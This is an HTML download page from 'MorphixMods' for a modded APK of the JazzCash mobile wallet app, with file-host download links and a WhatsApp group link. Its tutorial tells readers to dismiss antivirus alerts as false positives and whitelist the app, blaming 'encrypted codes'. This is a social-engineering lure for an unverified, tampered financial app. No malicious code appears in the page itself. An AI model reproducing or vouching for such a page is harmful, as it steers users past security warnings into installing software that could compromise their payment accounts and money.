<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="UTF-8">
   <title>Contact Links - MorphixMods</title>
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css'>
   <link rel="preconnect" href="https://fonts.googleapis.com">
   <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-solid-rounded/css/uicons-solid-rounded.css'>
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-thin-straight/css/uicons-thin-straight.css'>
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-solid-straight/css/uicons-solid-straight.css'>
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-thin-straight/css/uicons-thin-straight.css'>
   <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;600&display=swap" rel="stylesheet">
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-regular-rounded/css/uicons-regular-rounded.css'>
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-solid-rounded/css/uicons-solid-rounded.css'>
   <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-solid-straight/css/uicons-solid-straight.css'>
 
 
 
 
 
   <link rel='stylesheet' href='https://cdn-uicons.flaticon.com/uicons-solid-rounded/css/uicons-solid-rounded.css'>
   <style>
      @import url('https://fonts.googleapis.com/css2?family=Space+Grotesk:wght@300;400;500;600;700&display=swap');

      
      body {
        font-family: 'Space Grotesk', sans-serif;
        margin: 0;
        padding: 15px;
        background-image: url('https://i.ibb.co/KwZHbFb/b35eca81a14c27a30050c1cb2e151044.jpg');
        background-size: cover;
        background-position: center;
        min-height: 100vh;
        display: flex;
        align-items: center;
        justify-content: center;
        
        background-attachment: fixed;
  background-repeat: no-repeat;
  background-size: cover;
      }
      
      
      .parallax {
  /* The image used */
  background-image: url("img_parallax.jpg");

  /* Set a specific height */
  min-height: 500px;

  /* Create the parallax scrolling effect */
  background-attachment: fixed;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

      .container {
        max-width: 360px;
        width: 100%;
        padding: 20px;
        border: 2px solid rgba(255, 255, 255, 0.2);
        border-radius: 10px;
        backdrop-filter: blur(10px);
        background-color: rgba(255, 255, 255, 0.15);
        color: #FFD600; /* Yellow text */
      }
      
      .profile {
        text-align: center;
      }
      
      .photo {
        border-radius: 50%;
        width: 80px;
        height: 80px;
        display: block;
        margin: 0 auto;
      }
      .epphoto {
        border-radius: 0%;
        width: 80px;
        height: 80px;
        display: block;
        margin: 0 auto;
      }
      
      .profile_name {
        font-weight: bold;
        font-size: 20px;
        margin-bottom: 5px;
      }
      
      .at {
        font-size: 14px;
        color: rgba(255, 255, 255, 0.8);
      }
      
      .download-links {
        display: flex;
        flex-wrap: wrap;
        justify-content: center;
        margin-top: 30px;
      }
      
      .download-button {
        margin: 10px;
        padding: 12px 30px;
        background-color: rgba(255, 255, 255, 0.3);
        color: #FFD600; /* Yellow button text */
        text-align: center;
        text-decoration: none;
        border-radius: 30px;
        transition: ease all 0.3s;
        border: 2px solid rgba(255, 255, 255, 0.4);
        cursor: pointer;
        font-weight: normal;
        letter-spacing: 1px;
        display: inline-block;
      }
      
      .download-button:hover {
        background-color: rgba(255, 255, 255, 0.4);
      }
      
      .modded-by {
        text-align: center;
        font-size: 14px;
        margin-top: 20px;
        background-color: rgba(255, 255, 255, 0.3);
        border-radius: 30px;
        padding: 10px;
        font-weight: bold;
        letter-spacing: 1px;
      }
      
      .links-list {
        list-style: none;
        padding: 0;
        margin-top: 40px;
      }
      
      .link-item {
        margin: 14px 0;
      }
      
      .link {
        display: block;
        text-align: center;
        text-decoration: none;
        padding: 12px;
        background-color: rgba(255, 255, 255, 0.3);
        border-radius: 30px;
        transition: ease all 0.3s;
        color: #FFD600; /* Yellow button text */
        font-weight: normal;
        letter-spacing: 1px;
      }
      
      .link:hover {
        background-color: rgba(255, 255, 255, 0.4);
      }
      
      .stay-connected {
        text-align: center;
        font-weight: bold;
        font-size: 18px;
        margin-top: 40px;
        color: #FFD600; /* Yellow text */
      }
      
     
   /* Existing styles... */

   .wrap {
      border-radius: 10px;
      background-color: rgba(0, 0, 0, 0.1);
      padding: 20px;
      display: flex;
      justify-content: center; /* Horizontally center the container */
      align-items: center; /* Vertically center the container */
      min-height: 100vh; /* Add this to center the container vertically on the whole page */
   }
   p {
    color: white;
    font-size: 15px;
   }

   ul {
            list-style-type: disc;
            padding-left: 20px;
        }
   </style>
</head>

<body>
    <div class="parallax"></div>
    <div class="wrap">
       <div class="container">
          <div class="profile">
             <img alt="" src="https://i.ibb.co/s3tw3xz/new-logo-jazz.png" class="photo" />
             <br>
             <span class="profile_name">JazzCash Modded v9.0.54</span><br>
             <span class="at">Modded by MorphixMods</span>
          </div>

          <h3>What is modded?</h3>
          <p>Here are the latest updates for our app:</p>
    <ul>
        <li>Reduced APK size</li>
        <li>Upgraded to the latest version 9.0.54</li>
        <li>Cloneable with App Cloner</li>
        <li>Updated fonts</li>
        <li>Updated UI</li>
        <li>Bug fixes</li>
    </ul>     
          


          <h3>Tutorial</h3>
          <p>Please download the APK using the buttons provided below and proceed with the installation on your phone. You might encounter a false positive virus detection, but you can safely ignore it and add the app to the whitelist. This occurrence is a result of encrypted codes within the APK.</p>     
          
          <h3>Modder</h3>
          <p>This application has been exclusively modified by MorphixMods (0332 6098143), and it is freely available for use. My sole intention behind this modification is to enhance user convenience, and I have no intention to cause harm to anyone.</p>     
          
          
          
          <div class="download-links">
             <a href="https://www.mediafire.com/file/zbb1zuuom7uernr/JazzCash_9054_Free_Reduced_Optimized_MorfixMods.apk/file" class="download-button" id="mediafire-button"><i class="fi fi-sr-cloud-download-alt"></i> MediaFire</a>
             <a href="https://apkadmin.com/zvxo6ngob6db/JazzCash_9054_Free_Reduced_Optimized_MorfixMods.apk.html" class="download-button" id="apkadmin-button"><i class="fi fi-sr-cloud-download-alt"></i> ApkAdmin</a>
          </div>
          <div><br></div>
    
      
<!-- View Details link aligned center -->
<div style="text-align: center;">
  <a href="https://chat.whatsapp.com/Lm8cFUasnhf6KpxlQoHRmq" class="view-details-button" style="color: white;">
    <i class="fi fi-ss-following"></i> - MorphixMods
  </a>
</div>
          <hr>
          <br>
         




</body>
</html>
